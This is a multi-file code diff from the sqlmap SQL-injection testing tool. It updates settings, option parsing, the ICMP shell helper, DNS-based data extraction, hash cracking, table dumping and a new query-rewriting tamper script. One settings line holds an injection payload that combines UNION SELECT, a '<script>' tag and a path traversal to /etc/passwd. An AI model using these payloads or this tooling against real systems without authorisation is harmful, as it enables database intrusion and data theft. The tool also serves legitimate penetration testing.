-CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
+CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
 
 # Patterns often seen in HTTP headers containing custom injection marking character
 PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
@@ -457,7 +457,7 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
 BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
 
 # Payload used for checking of existence of IDS/WAF (dummier the better)
-IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
+IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,'<script>',table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
 
 # Data inside shellcodeexec to be filled with random string
 SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
@@ -483,6 +483,10 @@ SOCKET_PRE_CONNECT_QUEUE_SIZE = 3
 # Only console display last n table rows
 TRIM_STDOUT_DUMP_SIZE = 256
 
+# Reference: http://stackoverflow.com/a/3168436
+# Reference: https://support.microsoft.com/en-us/kb/899149
+DUMP_FILE_BUFFER_SIZE = 1024
+
 # Parse response headers only first couple of times
 PARSE_HEADERS_LIMIT = 3
 
@@ -526,7 +530,7 @@ HASHDB_FLUSH_RETRIES = 3
 HASHDB_END_TRANSACTION_RETRIES = 3
 
 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
-HASHDB_MILESTONE_VALUE = "JHjrBugdDA"  # "".join(random.sample(string.ascii_letters, 10))
+HASHDB_MILESTONE_VALUE = "WVMqopmuzX"  # "".join(random.sample(string.ascii_letters, 10))
 
 # Warn user of possible delay due to large page dump in full UNION query injections
 LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -571,7 +575,7 @@ MAX_BISECTION_LENGTH = 50 * 1024 * 1024
 LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
 
 # Generic SQL comment formation
-GENERIC_SQL_COMMENT = "-- -"
+GENERIC_SQL_COMMENT = "-- [RANDSTR]"
 
 # Threshold value for turning back on time auto-adjustment mechanism
 VALID_TIME_CHARS_RUN_THRESHOLD = 100
@@ -592,7 +596,7 @@ MAX_HELP_OPTION_LENGTH = 18
 MAX_CONNECT_RETRIES = 100
 
 # Strings for detecting formatting errors
-FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
+FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
 
 # Regular expression used for extracting ASP.NET view state values
 VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'

lib/core/target.py

@@ -451,7 +451,7 @@ def _resumeDBMS():
     dbms = value.lower()
     dbmsVersion = [UNKNOWN_DBMS_VERSION]
     _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS]))
-    _ = re.search("%s ([\d\.]+)" % _, dbms, re.I)
+    _ = re.search(r"\A%s (.*)" % _, dbms, re.I)
 
     if _:
         dbms = _.group(1).lower()

lib/core/threads.py

@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import difflib
+import random
 import threading
 import time
 import traceback
@@ -51,6 +52,7 @@ class _ThreadData(threading.local):
         self.lastRequestMsg = None
         self.lastRequestUID = 0
         self.lastRedirectURL = None
+        self.random = random.WichmannHill()
         self.resumed = False
         self.retriesCount = 0
         self.seqMatcher = difflib.SequenceMatcher(None)
@@ -200,7 +202,10 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
 
         for lock in kb.locks.values():
             if lock.locked_lock():
-                lock.release()
+                try:
+                    lock.release()
+                except thread.error:
+                    pass
 
         if conf.get("hashDB"):
             conf.hashDB.flush(True)

lib/core/update.py

@@ -5,6 +5,7 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import locale
 import os
 import re
 import time
@@ -43,7 +44,7 @@ def update():
         dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
 
         try:
-            process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH)
+            process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding()))  # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/
             pollProcess(process, True)
             stdout, stderr = process.communicate()
             success = not process.returncode

lib/core/wordlist.py

@@ -11,7 +11,6 @@ import zipfile
 from lib.core.common import getSafeExString
 from lib.core.exception import SqlmapDataException
 from lib.core.exception import SqlmapInstallationException
-from lib.core.settings import UNICODE_ENCODING
 
 class Wordlist(object):
     """

lib/parse/cmdline.py

@@ -464,6 +464,9 @@ def cmdLineParser(argv=None):
                                help="Exclude DBMS system databases when "
                                     "enumerating tables")
 
+        enumeration.add_option("--pivot-column", dest="pivotColumn",
+                               help="Pivot column name")
+
         enumeration.add_option("--where", dest="dumpWhere",
                                help="Use WHERE condition while table dumping")
 
@@ -617,6 +620,9 @@ def cmdLineParser(argv=None):
                             action="store_true",
                             help="Never ask for user input, use the default behaviour")
 
+        general.add_option("--binary-fields", dest="binaryFields",
+                          help="Result fields having binary values (e.g. \"digest\")")
+
         general.add_option("--charset", dest="charset",
                             help="Force character encoding used for data retrieval")
 
@@ -662,9 +668,6 @@ def cmdLineParser(argv=None):
                                   action="store_true",
                                   help="Parse and display DBMS error messages from responses")
 
-        general.add_option("--pivot-column", dest="pivotColumn",
-                               help="Pivot column name")
-
         general.add_option("--save", dest="saveConfig",
                             help="Save options to a configuration INI file")
 
@@ -760,12 +763,6 @@ def cmdLineParser(argv=None):
         parser.add_option("--profile", dest="profile", action="store_true",
                           help=SUPPRESS_HELP)
 
-        parser.add_option("--binary-fields", dest="binaryFields",
-                          help=SUPPRESS_HELP)
-
-        parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int",
-                          help=SUPPRESS_HELP)
-
         parser.add_option("--force-dns", dest="forceDns", action="store_true",
                           help=SUPPRESS_HELP)
 

lib/parse/html.py

@@ -24,7 +24,8 @@ class HTMLHandler(ContentHandler):
         ContentHandler.__init__(self)
 
         self._dbms = None
-        self._page = page
+        self._page = (page or "")
+        self._lower_page = self._page.lower()
 
         self.dbms = None
 
@@ -33,11 +34,20 @@ class HTMLHandler(ContentHandler):
         threadData.lastErrorPage = (threadData.lastRequestUID, self._page)
 
     def startElement(self, name, attrs):
+        if self.dbms:
+            return
+
         if name == "dbms":
             self._dbms = attrs.get("value")
 
         elif name == "error":
-            if re.search(attrs.get("regexp"), self._page, re.I):
+            regexp = attrs.get("regexp")
+            if regexp not in kb.cache.regex:
+                keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp))
+                keywords = sorted(keywords, key=len)
+                kb.cache.regex[regexp] = keywords[-1].lower()
+
+            if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
                 self.dbms = self._dbms
                 self._markAsErrorPage()
 

lib/request/basic.py

@@ -150,7 +150,7 @@ def checkCharEncoding(encoding, warn=True):
         return encoding
 
     # Reference: http://www.destructor.de/charsets/index.htm
-    translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8",  "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}
+    translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8",  "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
 
     for delimiter in (';', ',', '('):
         if delimiter in encoding:
@@ -204,7 +204,7 @@ def checkCharEncoding(encoding, warn=True):
     # Reference: http://docs.python.org/library/codecs.html
     try:
         codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
-    except LookupError:
+    except (LookupError, ValueError):
         if warn:
             warnMsg = "unknown web page charset '%s'. " % encoding
             warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"

lib/request/connect.py

@@ -32,7 +32,6 @@ from lib.core.agent import agent
 from lib.core.common import asciifyUrl
 from lib.core.common import calculateDeltaSeconds
 from lib.core.common import clearConsoleLine
-from lib.core.common import cpuThrottle
 from lib.core.common import dataToStdout
 from lib.core.common import evaluateCode
 from lib.core.common import extractRegexResult
@@ -220,8 +219,6 @@ class Connect(object):
 
         if isinstance(conf.delay, (int, float)) and conf.delay > 0:
             time.sleep(conf.delay)
-        elif conf.cpuThrottle:
-            cpuThrottle(conf.cpuThrottle)
 
         if conf.offline:
             return None, None, None
@@ -391,9 +388,10 @@ class Connect(object):
 
             for key, value in headers.items():
                 del headers[key]
-                headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(value, kb.pageEncoding)
+                value = unicodeencode(value, kb.pageEncoding)
                 for char in (r"\r", r"\n"):
                     value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", value)
+                headers[unicodeencode(key, kb.pageEncoding)] = value.strip("\r\n")
 
             url = unicodeencode(url)
             post = unicodeencode(post)
@@ -615,8 +613,12 @@ class Connect(object):
             elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
                 warnMsg = "connection was forcibly closed by the target URL"
             elif "timed out" in tbMsg:
-                singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
+                if not conf.disablePrecon:
-                conf.disablePrecon = True
+                    singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
+                    conf.disablePrecon = True
+
+                    if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
+                        kb.responseTimes.clear()
 
                 if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
                     singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")

lib/takeover/icmpsh.py

@@ -6,6 +6,8 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import os
+import re
+import socket
 import time
 
 from extra.icmpsh.icmpsh_m import main as icmpshmaster
@@ -54,15 +56,29 @@ class ICMPsh:
         if self.localIP:
             message += "[Enter for '%s' (detected)] " % self.localIP
 
-        while not address:
+        valid = None
-            address = readInput(message, default=self.localIP)
+        while not valid:
+            valid = True
+            address = readInput(message, default=self.localIP or "")
+
+            try:
+                socket.inet_aton(address)
+            except socket.error:
+                valid = False
+            finally:
+                valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None
 
             if conf.batch and not address:
                 raise SqlmapDataException("local host address is missing")
+            elif address and not valid:
+                warnMsg = "invalid local host address"
+                logger.warn(warnMsg)
 
         return address
 
     def _prepareIngredients(self, encode=True):
+        self.localIP = getattr(self, "localIP", None)
+        self.remoteIP = getattr(self, "remoteIP", None)
         self.lhostStr = ICMPsh._selectLhost(self)
         self.rhostStr = ICMPsh._selectRhost(self)
 

lib/techniques/blind/inference.py

@@ -5,11 +5,9 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-import re
 import threading
 import time
 
-from extra.safe2bin.safe2bin import safechardecode
 from extra.safe2bin.safe2bin import safecharencode
 from lib.core.agent import agent
 from lib.core.common import Backend
@@ -20,13 +18,11 @@ from lib.core.common import decodeIntToUnicode
 from lib.core.common import filterControlChars
 from lib.core.common import getCharset
 from lib.core.common import getCounter
-from lib.core.common import getUnicode
 from lib.core.common import goGoodSamaritan
 from lib.core.common import getPartRun
 from lib.core.common import hashDBRetrieve
 from lib.core.common import hashDBWrite
 from lib.core.common import incrementCounter
-from lib.core.common import randomInt
 from lib.core.common import safeStringFormat
 from lib.core.common import singleTimeWarnMessage
 from lib.core.data import conf
@@ -44,7 +40,6 @@ from lib.core.settings import INFERENCE_UNKNOWN_CHAR
 from lib.core.settings import INFERENCE_GREATER_CHAR
 from lib.core.settings import INFERENCE_EQUALS_CHAR
 from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
-from lib.core.settings import MIN_TIME_RESPONSES
 from lib.core.settings import MAX_BISECTION_LENGTH
 from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
 from lib.core.settings import NULL

lib/techniques/dns/use.py

@@ -61,6 +61,10 @@ def dnsUse(payload, expression):
                 chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
                 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
                 nulledCastedField = agent.nullAndCastField(fieldToCastStr)
+                extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0)
+                if extendedField != fieldToCastStr:  # e.g. MIN(surname)
+                    nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField)
+                    fieldToCastStr = extendedField
                 nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
                 nulledCastedField = agent.hexConvertField(nulledCastedField)
                 expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)

lib/utils/hash.py

@@ -30,6 +30,7 @@ import os
 import re
 import tempfile
 import time
+import zipfile
 
 from hashlib import md5
 from hashlib import sha1
@@ -45,6 +46,7 @@ from lib.core.common import dataToStdout
 from lib.core.common import getFileItems
 from lib.core.common import getPublicTypeMembers
 from lib.core.common import getSafeExString
+from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import hashDBWrite
 from lib.core.common import normalizeUnicode
@@ -60,6 +62,7 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import HASH
+from lib.core.exception import SqlmapDataException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.settings import COMMON_PASSWORD_SUFFIXES
 from lib.core.settings import COMMON_USER_COLUMNS
@@ -490,7 +493,7 @@ def attackDumpedTable():
 
             for (_, hash_, password) in results:
                 if hash_:
-                    lut[hash_.lower()] = password
+                    lut[hash_.lower()] = getUnicode(password)
 
             infoMsg = "postprocessing table dump"
             logger.info(infoMsg)
@@ -785,6 +788,14 @@ def dictionaryAttack(attack_dict):
                     for dictPath in dictPaths:
                         checkFile(dictPath)
 
+                        if os.path.splitext(dictPath)[1].lower() == ".zip":
+                            _ = zipfile.ZipFile(dictPath, 'r')
+                            if len(_.namelist()) == 0:
+                                errMsg = "no file(s) inside '%s'" % dictPath
+                                raise SqlmapDataException(errMsg)
+                            else:
+                                _.open(_.namelist()[0])
+
                     kb.wordlists = dictPaths
 
                 except Exception, ex:

lib/utils/hashdb.py

@@ -66,7 +66,7 @@ class HashDB(object):
     @staticmethod
     def hashKey(key):
         key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key)
-        retVal = int(hashlib.md5(key).hexdigest()[:12], 16)
+        retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff  # Reference: http://stackoverflow.com/a/4448400
         return retVal
 
     def retrieve(self, key, unserialize=False):
@@ -97,6 +97,7 @@ class HashDB(object):
             try:
                 retVal = unserializeObject(retVal)
             except:
+                retVal = None
                 warnMsg = "error occurred while unserializing value for session key '%s'. " % key
                 warnMsg += "If the problem persists please rerun with `--flush-session`"
                 logger.warn(warnMsg)

lib/utils/search.py

@@ -5,7 +5,6 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-import cookielib
 import httplib
 import re
 import socket
@@ -26,7 +25,6 @@ from lib.core.enums import HTTP_HEADER
 from lib.core.enums import REDIRECTION
 from lib.core.exception import SqlmapBaseException
 from lib.core.exception import SqlmapConnectionException
-from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.settings import DUMMY_SEARCH_USER_AGENT
 from lib.core.settings import DUCKDUCKGO_REGEX
@@ -35,7 +33,6 @@ from lib.core.settings import GOOGLE_REGEX
 from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
 from lib.core.settings import UNICODE_ENCODING
 from lib.request.basic import decodePage
-from lib.request.httpshandler import HTTPSHandler
 from thirdparty.socks import socks
 
 

plugins/generic/databases.py

@@ -572,7 +572,11 @@ class Databases:
                                             query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper()))
                                         else:
                                             query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name))
+
                                         comment = unArrayizeValue(inject.getValue(query, blind=False, time=False))
+                                        if not isNoneValue(comment):
+                                            infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name)
+                                            logger.info(infoMsg)
                                     else:
                                         warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
                                         warnMsg += "possible to get column comments"
@@ -702,7 +706,11 @@ class Databases:
                                     query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper()))
                                 else:
                                     query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column))
+
                                 comment = unArrayizeValue(inject.getValue(query, union=False, error=False))
+                                if not isNoneValue(comment):
+                                    infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column)
+                                    logger.info(infoMsg)
                             else:
                                 warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
                                 warnMsg += "possible to get column comments"

plugins/generic/entries.py

@@ -169,7 +169,14 @@ class Entries:
                         if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
                             table = "%s.%s" % (conf.db, tbl)
 
-                            retVal = pivotDumpTable(table, colList, blind=False)
+                            try:
+                                retVal = pivotDumpTable(table, colList, blind=False)
+                            except KeyboardInterrupt:
+                                retVal = None
+                                kb.dumpKeyboardInterrupt = True
+                                clearConsoleLine()
+                                warnMsg = "Ctrl+C detected in dumping phase"
+                                logger.warn(warnMsg)
 
                             if retVal:
                                 entries, _ = retVal
@@ -269,7 +276,14 @@ class Entries:
                         elif Backend.isDbms(DBMS.MAXDB):
                             table = "%s.%s" % (conf.db, tbl)
 
-                        retVal = pivotDumpTable(table, colList, count, blind=True)
+                        try:
+                            retVal = pivotDumpTable(table, colList, count, blind=True)
+                        except KeyboardInterrupt:
+                            retVal = None
+                            kb.dumpKeyboardInterrupt = True
+                            clearConsoleLine()
+                            warnMsg = "Ctrl+C detected in dumping phase"
+                            logger.warn(warnMsg)
 
                         if retVal:
                             entries, lengths = retVal
@@ -320,6 +334,7 @@ class Entries:
                                     entries[column].append(value)
 
                         except KeyboardInterrupt:
+                            kb.dumpKeyboardInterrupt = True
                             clearConsoleLine()
                             warnMsg = "Ctrl+C detected in dumping phase"
                             logger.warn(warnMsg)

sqlmap.conf

@@ -482,6 +482,9 @@ col =
 # Back-end database management system database table column(s) to not enumerate.
 excludeCol = 
 
+# Pivot column name.
+pivotColumn =
+
 # Use WHERE condition while table dumping (e.g. "id=1").
 dumpWhere = 
 
@@ -650,6 +653,9 @@ trafficFile =
 # Valid: True or False
 batch = False
 
+# Result fields having binary values (e.g. "digest").
+binaryFields =
+
 # Force character encoding used for data retrieval.
 charset = 
 
@@ -697,9 +703,6 @@ outputDir =
 # Valid: True or False
 parseErrors = False
 
-# Pivot column name.
-pivotColumn =
-
 # Regular expression for filtering targets from provided Burp.
 # or WebScarab proxy log.
 # Example: (google|yahoo)

sqlmap.py

@@ -5,6 +5,12 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import sys
+
+sys.dont_write_bytecode = True
+
+from lib.utils import versioncheck  # this has to be the first non-standard import
+
 import bdb
 import inspect
 import logging
@@ -17,13 +23,9 @@ import time
 import traceback
 import warnings
 
-sys.dont_write_bytecode = True
-
 warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
 warnings.filterwarnings(action="ignore", category=DeprecationWarning)
 
-from lib.utils import versioncheck  # this has to be the first non-standard import
-
 from lib.controller.controller import start
 from lib.core.common import banner
 from lib.core.common import createGithubIssue
@@ -83,6 +85,7 @@ def main():
             raise SystemExit
 
         setPaths()
+        banner()
 
         # Store original command line options for possible later restoration
         cmdLineOptions.update(cmdLineParser().__dict__)
@@ -95,8 +98,6 @@ def main():
             sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
             setRestAPILog()
 
-        banner()
-
         conf.showTime = True
         dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
         dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True)
@@ -173,6 +174,11 @@ def main():
                 logger.error(errMsg)
                 raise SystemExit
 
+            elif "_mkstemp_inner" in excMsg:
+                errMsg = "there has been a problem while accessing temporary files"
+                logger.error(errMsg)
+                raise SystemExit
+
             elif all(_ in excMsg for _ in ("pymysql", "configparser")):
                 errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)"
                 logger.error(errMsg)
@@ -185,6 +191,9 @@ def main():
                 logger.error(errMsg)
                 raise SystemExit
 
+            elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"):
+                raise SystemExit
+
             for match in re.finditer(r'File "(.+?)", line', excMsg):
                 file_ = match.group(1)
                 file_ = os.path.relpath(file_, os.path.dirname(__file__))

tamper/commalesslimit.py

@@ -0,0 +1,37 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGH
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
+
+    Requirement:
+        * MySQL
+
+    Tested against:
+        * MySQL 5.0 and 5.5
+
+    >>> tamper('LIMIT 2, 3')
+    'LIMIT 3 OFFSET 2'
+    """
+
+    retVal = payload
+
+    match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "")
+    if match:
+        retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1)))
+
+    return retVal

tamper/escapequotes.py

@@ -5,10 +5,7 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-import base64
-
 from lib.core.enums import PRIORITY
-from lib.core.settings import UNICODE_ENCODING
 
 __priority__ = PRIORITY.LOWEST
 

thirdparty/colorama/__init__.py

@@ -0,0 +1,7 @@
+# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
+from .initialise import init, deinit, reinit, colorama_text
+from .ansi import Fore, Back, Style, Cursor
+from .ansitowin32 import AnsiToWin32
+
+__version__ = '0.3.7'
+

thirdparty/colorama/ansi.py

@@ -1,49 +1,102 @@
+# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
 '''
 This module generates ANSI character codes to printing colors to terminals.
 See: http://en.wikipedia.org/wiki/ANSI_escape_code
 '''
 
 CSI = '\033['
+OSC = '\033]'
+BEL = '\007'
+
 
 def code_to_chars(code):
     return CSI + str(code) + 'm'
 
+def set_title(title):
+    return OSC + '2;' + title + BEL
+
+def clear_screen(mode=2):
+    return CSI + str(mode) + 'J'
+
+def clear_line(mode=2):
+    return CSI + str(mode) + 'K'
+
+
 class AnsiCodes(object):
-    def __init__(self, codes):
+    def __init__(self):
-        for name in dir(codes):
+        # the subclasses declare class attributes which are numbers.
+        # Upon instantiation we define instance attributes, which are the same
+        # as the class attributes but wrapped with the ANSI escape sequence
+        for name in dir(self):
             if not name.startswith('_'):
-                value = getattr(codes, name)
+                value = getattr(self, name)
                 setattr(self, name, code_to_chars(value))
 
-class AnsiFore:
-    BLACK   = 30
-    RED     = 31
-    GREEN   = 32
-    YELLOW  = 33
-    BLUE    = 34
-    MAGENTA = 35
-    CYAN    = 36
-    WHITE   = 37
-    RESET   = 39
 
-class AnsiBack:
+class AnsiCursor(object):
-    BLACK   = 40
+    def UP(self, n=1):
-    RED     = 41
+        return CSI + str(n) + 'A'
-    GREEN   = 42
+    def DOWN(self, n=1):
-    YELLOW  = 43
+        return CSI + str(n) + 'B'
-    BLUE    = 44
+    def FORWARD(self, n=1):
-    MAGENTA = 45
+        return CSI + str(n) + 'C'
-    CYAN    = 46
+    def BACK(self, n=1):
-    WHITE   = 47
+        return CSI + str(n) + 'D'
-    RESET   = 49
+    def POS(self, x=1, y=1):
+        return CSI + str(y) + ';' + str(x) + 'H'
 
-class AnsiStyle:
+
+class AnsiFore(AnsiCodes):
+    BLACK           = 30
+    RED             = 31
+    GREEN           = 32
+    YELLOW          = 33
+    BLUE            = 34
+    MAGENTA         = 35
+    CYAN            = 36
+    WHITE           = 37
+    RESET           = 39
+
+    # These are fairly well supported, but not part of the standard.
+    LIGHTBLACK_EX   = 90
+    LIGHTRED_EX     = 91
+    LIGHTGREEN_EX   = 92
+    LIGHTYELLOW_EX  = 93
+    LIGHTBLUE_EX    = 94
+    LIGHTMAGENTA_EX = 95
+    LIGHTCYAN_EX    = 96
+    LIGHTWHITE_EX   = 97
+
+
+class AnsiBack(AnsiCodes):
+    BLACK           = 40
+    RED             = 41
+    GREEN           = 42
+    YELLOW          = 43
+    BLUE            = 44
+    MAGENTA         = 45
+    CYAN            = 46
+    WHITE           = 47
+    RESET           = 49
+
+    # These are fairly well supported, but not part of the standard.
+    LIGHTBLACK_EX   = 100
+    LIGHTRED_EX     = 101
+    LIGHTGREEN_EX   = 102
+    LIGHTYELLOW_EX  = 103
+    LIGHTBLUE_EX    = 104
+    LIGHTMAGENTA_EX = 105
+    LIGHTCYAN_EX    = 106
+    LIGHTWHITE_EX   = 107
+
+
+class AnsiStyle(AnsiCodes):
     BRIGHT    = 1
     DIM       = 2
     NORMAL    = 22
     RESET_ALL = 0
 
